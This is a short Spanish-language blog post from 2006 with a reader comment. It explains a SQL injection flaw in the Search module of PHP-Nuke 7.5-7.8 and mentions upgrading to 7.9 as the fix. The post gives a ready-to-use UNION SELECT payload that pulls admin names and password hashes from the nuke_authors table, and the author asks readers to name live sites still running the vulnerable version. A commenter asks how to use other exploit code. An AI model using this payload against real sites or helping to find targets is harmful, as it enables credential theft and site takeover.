Mar 21 feb 2006
Nuevo bug para Php-Nuke, originalmente publicado por Janek Vind.
Esta vez la vulnerabilidad se encuentra en el modulo "Search" de las versiones 7.5-7.8. Nuevas versiones o anteriores no son vulnerables por estar programadas de otra manera.
Bueno.. como se explota?? Muy facil… dentro del modulo Search (www.sitiovulnerable.com/modules.php?name=Search)
Se completa en el campo buscar lo siguiente (sin las comillas):
"p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* "
y si todo anda bien tendremos una lista de los admis y los hashs de sus pass.
.::Solución::.
Actualizar a la version 7.9 o modificar la parte del codigo vulnerable ( es solo una linea )
Prueben, pero no dañen… recuerden avisar al webmaster una ves encontrado el bug.
si alguno conoce alguna pagina que tenga esta version, escribanla porque no encuentro ninguna
Jajaja AMigo!Muy Bueno..Pero tengo una duda..Vi otros Tutoriales Con Unos codigos de 5000 Lineas..Como codigos de programacion Siempre para PHPBB2 pero no c dond los tengo q poner..Me podrias Ayudar?Grax!